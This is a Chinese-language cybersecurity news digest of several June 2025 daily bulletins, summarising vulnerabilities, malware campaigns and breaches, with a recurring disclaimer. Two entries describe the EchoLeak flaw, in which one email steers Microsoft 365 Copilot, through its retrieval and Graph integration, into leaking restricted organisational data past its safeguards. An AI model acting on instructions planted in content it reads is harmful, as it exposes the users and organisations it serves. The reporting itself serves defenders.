Blink路由器曝5个9.8分高危漏洞(CVE-2025-45984至45988),攻击者无需认证即可通过HTTP请求注入恶意命令,完全控制设备。影响多款消费级和企业级型号,建议立即更新固件并限制管理界面访问。 7、libxml2 漏洞曝光:内存破坏、远程代码执行与拒绝服务威胁 https://securityonline.info/libxml2-flaws-exposed-memory-corruption-rce-dos-threats-uncovered/ 知名XML解析库libxml2曝高危漏洞,可致内存破坏、远程代码执行及服务崩溃,建议立即更新版本并严格验证XML输入,部署ASLR等防护措施。 8、虚拟绑架诈骗利用人性恐惧:AI技术助长新型犯罪浪潮 https://www.helpnetsecurity.com/2025/06/16/virtual-kidnapping-scams/ 虚拟绑架诈骗利用AI伪造亲人声音和社交媒体信息制造恐慌,通过情感勒索索要赎金。深度伪造技术使骗局更逼真,社交媒体泄露的信息成为犯罪工具。专家建议保持冷静、验证信息、保护隐私并立即报警,强调公众需提高警惕应对这一隐蔽犯罪趋势。 9、IBM备份服务权限提升漏洞威胁IBM i系统安全 https://securityonline.info/privilege-escalation-flaw-in-ibm-backup-services-threatens-ibm-i-environments-cve-2025-33108/ IBM备份服务BRMS存在高危漏洞CVE-2025-33108,影响i系统7.5/7.4版本,攻击者可利用未限定库调用提升权限。CVSS评分8.5,需立即安装对应PTF补丁修复。 10、微软Defender for Identity 漏洞可致未授权权限提升 https://www.freebuf.com/articles/434889.html NetSPI 研究人员详细披露了 Microsoft Defender for Identity(MDI)中的欺骗漏洞(CVE-2025-26685)。该漏洞虽无法单独利用,但与其他漏洞结合时可能使攻击者无需认证即可在 Active Directory 环境中实现权限提升。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年06月16日
1、黑客使用过期的Discord邀请链接传播恶意软件 https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/ Check Point Research近期披露,一场活跃的恶意软件攻击行动正利用Discord平台存在的漏洞——攻击者通过注册已过期或被释放的邀请链接,悄无声息地将用户从原本可信的社区重定向至恶意服务器。这种“接管式”劫持手段尤其危险,因为很多受害者都是通过过去在论坛、社交媒体或官网中发布的旧链接点击进入。此次攻击利用了“ClickFix”钓鱼技术、 2、维多利亚的秘密遭遇网络攻击后恢复关键系统 https://www.bleepingcomputer.com/news/security/victorias-secret-restores-critical-systems-after-cyberattack/ 知名内衣零售商维多利亚的秘密在5月24日遭遇一起网络安全事件,导致其企业系统和电商网站被迫下线。目前,公司已成功恢复全部关键系统,并表示不会对2025财年产生重大财务影响。该公司在提交给美国证券交易委员会(SEC)的声明中表示,系统已全面恢复,正与外部网络安全专家合作,持续评估事件的整体影响。“我们已立即启动应急响应机制,阻断并清除未授权访问,所有关键系统目前均已恢复并正常运行 3、Paragon间谍软件利用iMessage零点击漏洞攻击欧洲记者 https://securityaffairs.com/178940/mobile-2/paragon-graphite-spyware-used-a-zero-day-exploit.html Citizen Lab披露,以色列公司Paragon的Graphite间谍软件利用iMessage零点击攻击,成功入侵至少两名欧洲记者的iPhone。受害者包括意大利媒体Fanpage.it的记者Ciro Pellegrino和一名匿名记者,其设备均在运行最新iOS时被攻破,Apple随后修复了该零日漏洞(CVE-2025-43200)。日志显示,两部手机与同一Graphite间谍服务器通信,指向同 4、SmartAttack攻击技术使用智能手表窃取物理隔离系统的数据 https://www.bleepingcomputer.com/news/security/smartattack-uses-smartwatches-to-steal-data-from-air-gapped-systems/ 以色列研究团队近日公布一项名为“SmartAttack”的新型攻击技术,首次展示如何利用智能手表窃取物理隔离(air-gapped)系统中的敏感信息。该技术由安全研究专家Mordechai Guri领导,其团队长期研究隐蔽数据通道攻击。攻击流程依赖于先通过内部威胁或供应链攻击感染隔离系统,然后利用系统自带扬声器发出18.5kHz至19.5kHz的超声波信号编码数据 5、微软365 Copilot服务存在零点击AI漏洞 https://www.aim.security/lp/aim-labs-echoleak-blogpost 安全公司Aim Labs近日披露了一项严重的零点击AI漏洞“EchoLeak”,该漏洞影响微软365 Copilot服务。研究人员发现,攻击者无需用户交互,仅通过发送一封电子邮件,即可远程触发漏洞,从M365 Copilot中窃取组织内部的敏感数据。这一攻击链基于名为“LLM作用域越界”(LLM Scope Violation)的新型利用方式,通过操控AI内部模型机制,使Copilot访问并泄露本应受限的数据,完全绕过传统的权限控制。该漏洞利用微软Graph接口与RAG模型的深度整合 6、Fog勒索软件使用合法工具和开源工具发起攻击活动 https://securityaffairs.com/178969/malware/unusual-toolset-used-in-recent-fog-ransomware-attack.html 2025年5月,Fog勒索软件组织攻击了一家亚洲金融机构,采用了一组极为罕见的渗透与监控工具,引发安全研究人员关注。据Symantec报告,攻击者在入侵中使用了Syteca监控软件、GC2、Stowaway和Adaptix等工具,这些工具通常出现在红队测试或间谍行动中,而非传统勒索软件攻击中。攻击者潜伏在受害网络内长达两周,显示出高度策划与耐心。更罕见的是,攻击完成后还创建了持久性服务以保持访 7、趋势科技修复产品中的多个远程代码执行和身份验证绕过漏洞 https://www.bleepingcomputer.com/news/security/trend-micro-fixes-six-critical-flaws-on-apex-central-endpoint-encryption-policyserver/ Trend Micro近日发布安全更新,修复其Apex Central与Endpoint Encryption PolicyServer产品中的多个严重漏洞。这些漏洞可被远程攻击者在无需认证的情况下执行任意代码或绕过认证机制,最高风险等级为CVSS 9.8,威胁等级极高。在Endpoint Encryption PolicySe 8、GitLab发布多个版本更新修复账户接管漏洞 https://www.bleepingcomputer.com/news/security/gitlab-patches-high-severity-account-takeover-missing-auth-issues/ GitLab近日发布多个版本安全更新(18.0.2、17.11.4、17.10.8),修复多个高危漏洞,包含可导致账户接管、CI/CD恶意任务注入、跨站脚本攻击及拒绝服务等问题。官方强烈建议所有自托管用户立即升级,以防止遭受攻击。其中,漏洞CVE-2025-4278允许远程攻击者通过HTML注入手段在搜索页面中植入恶意代码,从而实现账户接管。此外,CVE-2025-5 9、Cloudflare近日证实大规模宕机源于第三方存储故障 https://www.bleepingcomputer.com/news/security/cloudflare-outage-not-caused-by-security-incident-data-is-safe/ Cloudflare近日证实,其全球服务大规模中断事件并非由安全事件引发,用户数据未出现泄露或丢失。此次故障发生于协调世界时间6月13日17时52分,起因是其关键服务Workers KV系统完全离线,导致多个边缘计算与AI服务瘫痪,甚至波及Google Cloud Platform等广泛使用的第三方平台。经调查,根本原因是Workers KV底层依赖的一家第三方云服务提供商 10、宏碁控制中心漏洞允许攻击者以SYSTEM权限远程执行代码 https://www.freebuf.com/articles/system/434755.html 宏碁公司近日发布关键安全更新,修复其ControlCenter(控制中心)工具中新发现的本地权限提升漏洞。该漏洞可能允许未经身份验证的远程攻击者以NT AUTHORITY\SYSTEM权限执行代码——这是Windows系统中的最高权限级别。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年06月13日
1、Erie保险公司确认遭遇网络攻击导致服务中断 https://www.bleepingcomputer.com/news/security/erie-insurance-confirms-cyberattack-behind-business-disruptions/ Erie保险及其管理公司Erie Indemnity确认,6月7日(周六)发生的一起网络攻击事件导致了近期大范围业务中断和平台宕机。此次攻击造成客户无法登录在线门户、提交索赔或接收文件,引发广泛影响。公司在向美国证券交易委员会提交的8-K报告中披露,其信息安全团队在当日检测到“异常网络活动”,随后立即启动事件响应机制,并联合执法部门与网络安全专家展开深入调查。目前尚未明确 2、CISA警告SinoTrack GPS设备存在远程控制漏洞 https://hackread.com/cisa-remote-control-flaws-sinotrack-gps-trackers/ 美国网络安全与基础设施安全局(CISA)近日发布安全警报,指出SinoTrack品牌GPS定位设备存在严重安全漏洞,可能被黑客远程控制车辆或实时追踪位置。研究员Raúl Ignacio Cruz Jiménez发现,该设备普遍存在弱认证漏洞(CVE-2025-5484)和用户名预测漏洞(CVE-2025-5485),其中后一漏洞CVSS评分高达8.8,属高危级别。攻击者可通过默认通用密码及公开设备标识码轻松入侵系统,实现远程操控,甚至切断车辆燃油供应。 3、国际刑警组织联合26个国家打击信息窃取相关的基础设施 https://securityaffairs.com/178898/cyber-crime/operation-secure-interpol-dismantles-20000-malicious-ips-in-major-cybercrime-crackdown.html 2025年1月至4月,国际刑警组织(INTERPOL)联合26个国家发起“安全行动”(Operation Secure),成功打击超过20000个与信息窃取恶意软件相关的恶意IP和域名。这场跨国协作行动得到Group-IB、卡巴斯基、趋势科技等网络安全公司的支持,调查人员追踪服务器、绘制网络结构,并开展定向打击。行动共 4、美国航空业秘密向国土安全部出售乘客飞行数据 https://www.malwarebytes.com/blog/news/2025/06/us-airline-industry-quietly-selling-flight-data-to-dhs 由美国主要航空公司共同拥有的数据中介机构ARC(Airlines Reporting Corporation)被曝通过其“旅行情报计划”(TIP),向美国国土安全部(DHS)下属机构——海关与边境保护局(CBP)和移民与海关执法局(ICE)——出售乘客的航班数据。所出售数据包含乘客姓名、行程、旅行日期、支付信息,甚至包括信用卡号码。这些数据来源于美国旅行社提交的每日售票记录。ARC是航空公司 5、Outlook路径遍历漏洞允许攻击者远程执行任意代码 https://www.freebuf.com/articles/system/434452.html 微软Outlook电子邮件客户端中存在一个重大安全漏洞,可能允许攻击者远程执行任意代码,即使需要本地访问权限才能触发漏洞利用。该漏洞编号为CVE-2025-47176,于2025年6月10日披露,被微软评为"重要"级别,CVSS评分为7.8分。这一漏洞影响广泛使用的电子邮件应用程序,对企业用户和个人用户构成重大风险,特别是考虑到它只需要低级别权限即可利用,且一旦触发无需用户交互。 6、超8万微软Entra ID账户遭定向攻击 https://www.freebuf.com/articles/es/434578.html 网络安全研究人员发现,攻击者正利用名为TeamFiltration的开源渗透测试框架,对微软Entra ID(原Azure Active Directory)用户账户发起新型账户接管(ATO)攻击。Proofpoint公司将此次攻击活动命名为UNK_SneakyStrike,自2024年12月出现登录尝试激增以来,已影响数百家组织云租户中的超8万个目标账户。 7、微软365 Copilot零点击漏洞可致攻击者窃取Teams敏感数据 https://cybersecuritynews.com/zero-click-microsoft-365-copilot-vulnerability/ 微软365 Copilot曝"EchoLeak"零点击漏洞,攻击者可窃取邮件、文件等敏感数据,无需用户交互。该漏洞利用AI系统设计缺陷,绕过四项安全措施,实现自动数据外泄,凸显AI应用安全风险。微软尚未发布补丁,企业需警惕AI集成带来的新型威胁。 8、火狐浏览器内存破坏高危漏洞可导致远程代码执行 https://securityonline.info/urgent-firefox-alert-critical-memory-corruption-flaws-cvss-9-8-allow-remote-code-execution/ 火狐发布紧急更新修复两个高危漏洞(CVSS 9.8),涉及画布操作内存破坏和JavaScript引擎整数溢出,可致远程代码执行。用户需立即升级至139.0.4版本并启用自动更新。 9、Salesforce行业云曝出20个安全漏洞,含多个零日漏洞 https://hackread.com/salesforce-industry-cloud-20-vulnerabilities-0days/ Salesforce行业云曝20余项安全漏洞,含5个高危零日漏洞,可致加密数据泄露和凭证窃取。用户配置错误是主因,部分漏洞需客户自行修复。企业需立即检查配置并使用检测工具防范风险。 10、GitLab紧急安全警报:高危漏洞可导致账户接管与代码注入 https://securityonline.info/urgent-gitlab-security-alert-high-severity-flaws-allow-account-takeover-code-injection/ GitLab紧急修复多个高危漏洞,包括HTML注入导致账户接管、XSS攻击和CI/CD恶意作业注入,建议立即升级至18.0.2、17.11.4或17.10.8版本。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年06月12日
1、FIN6黑客组织伪造求职者身份实施定向钓鱼攻击 https://dti.domaintools.com/Skeleton-Spider-Trusted-Cloud-Malware-Delivery/ 知名网络犯罪组织FIN6(又名Skeleton Spider)近期被曝光利用社交工程手段和云服务基础设施,通过伪造求职者身份实施定向钓鱼攻击。攻击者伪装成候选人通过LinkedIn、Indeed等平台与招聘方建立联系,再发送包含假简历网站的钓鱼信息。受害者需手动输入伪装为个人简历主页的域名,页面托管在AWS云服务上,并部署了复杂的访问过滤机制,只有满足特定条件的访问者才能看到恶意ZIP文件。该文件内嵌有LNK快捷方式,实际执行JavaScri 2、DanaBot C2服务器存在内存泄漏漏洞导致黑客数据泄露 https://www.zscaler.com/blogs/security-research/danableed-danabot-c2-server-memory-leak-bug 近期,安全研究团队ThreatLabz披露了DanaBot恶意软件控制服务器存在严重内存泄漏漏洞,被命名为“DanaBleed”。DanaBot自2018年起活跃,是一个以恶意软件即服务(MaaS)模式运营的平台,主要用于信息窃取与银行欺诈。2022年6月起,DanaBot发布的新版本引入了一个编程错误,导致C2服务器在回应受感染主机请求时,无意中泄露了其进程内存中的数据。这一漏洞持续近三年,期间泄露信息包括黑 3、研究人员曝光20个最容易被黑客利用的顶级域名 https://hackread.com/top-level-domain-names-hackers-abused-phishing-attacks/ ANY.RUN近期发布的一项研究揭示了2025年黑客最常用于钓鱼攻击的20个顶级域名(TLD),其中.li、.es和.dev等域名因频繁被利用而位列前茅。数据显示,57%的.li域名被用于恶意目的,虽然其中大多数并不直接托管钓鱼页面,而是作为中间跳转器,将用户引导至伪装成合法站点的钓鱼平台或恶意软件下载链接。这些域名常被用于伪造登录门户、假冒快递通知或诱导付款操作,.es域名因其本地化特征,在西语地区尤具欺骗性;而.sbs和.cfd因注册成 4、Binarly研究团队披露一个UEFI Secure Boot绕过漏洞 https://www.binarly.io/blog/another-crack-in-the-chain-of-trust Binarly Research团队披露了一个影响广泛的UEFI Secure Boot绕过漏洞(CVE-2025-3052),该漏洞存在于一个使用微软第三方UEFI证书签名的BIOS更新模块中。攻击者可利用该模块中对NVRAM变量的未验证操作,实现任意内存写入,从而禁用Secure Boot机制,在操作系统加载前执行任意未签名代码,部署Bootkit等恶意组件,完全绕过操作系统级别的安全防护。该模块最初由DT Research开发,但由于其使用的是微软广泛信任的“ 5、ConnectWise因安全隐患更换数字代码签名证书 https://www.bleepingcomputer.com/news/security/connectwise-rotating-code-signing-certificates-over-security-concerns/ ConnectWise近日宣布将更换用于ScreenConnect、ConnectWise Automate及RMM可执行文件的数字代码签名证书,此举源于第三方安全研究员提出的配置数据潜在利用风险。数字证书用于保证软件下载来源可信及代码未被篡改,确保用户安全。此次更换与上月遭遇的国家级网络攻击无关。ConnectWise表示,ScreenConnect安装程序 6、Windows WebDAV 零日远程代码执行漏洞遭野外利用 https://www.freebuf.com/articles/system/434328.html 微软已确认其Web分布式创作和版本控制(WebDAV)实现中存在一个严重的零日漏洞正遭攻击者野外利用,这促使微软在2025年6月的补丁星期二发布紧急安全更新。该漏洞编号为CVE-2025-33053,属于严重的远程代码执行(RCE)缺陷,允许未经授权的攻击者通过外部控制WebDAV中的文件名或路径,通过网络执行任意代码。此安全漏洞影响所有受支持的微软Windows版本,使其成为当前补丁周期中修复范围最广的漏洞之一。 7、新型SharePoint钓鱼攻击采用精妙欺骗技术绕过防护 https://www.freebuf.com/news/434312.html 网络安全领域出现了一波新型钓鱼攻击浪潮,攻击者利用Microsoft SharePoint这一可信平台绕过传统安全防护措施,标志着网络威胁战术的重大演变。这些攻击充分利用了SharePoint在企业环境中的固有可信度,诱使用户误以为正在与真实的微软服务进行交互。 8、攻击者利用AWS托管虚假简历在LinkedIn传播恶意软件 https://www.freebuf.com/news/434316.html 以经济利益为驱动的威胁组织FIN6(又称Camouflage Tempest、Gold Franklin等)近期被发现利用亚马逊云服务(AWS)基础设施托管虚假简历,传播名为More_eggs的恶意软件家族。DomainTools调查团队(DTI)向《黑客新闻》提供的报告显示:"该组织通过伪装求职者在LinkedIn等平台与招聘人员建立联系后,发送包含恶意软件的钓鱼信息。" 9、Windows 远程桌面服务漏洞可导致远程代码执行 https://cybersecuritynews.com/windows-remote-desktop-services-rce-vulnerability/ 高危漏洞CVE-2025-32710影响多版本Windows Server,允许未经认证远程代码执行,CVSS评分8.1。攻击需网络访问并利用竞态条件,虽复杂度高但威胁严重。微软已发布补丁,建议立即更新并限制RDP暴露。 10、全球超4万台联网摄像头暴露实时画面 https://securityonline.info/warning-40000-internet-connected-cameras-are-exposed-streaming-live-globally/ 全球超4万台联网摄像头存在暴露风险,无需认证即可实时窥探家庭、医院等场所,威胁隐私与安全。美日数量最多,主流厂商产品存漏洞。建议禁用远程访问、修改默认凭证、更新固件等防护措施。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页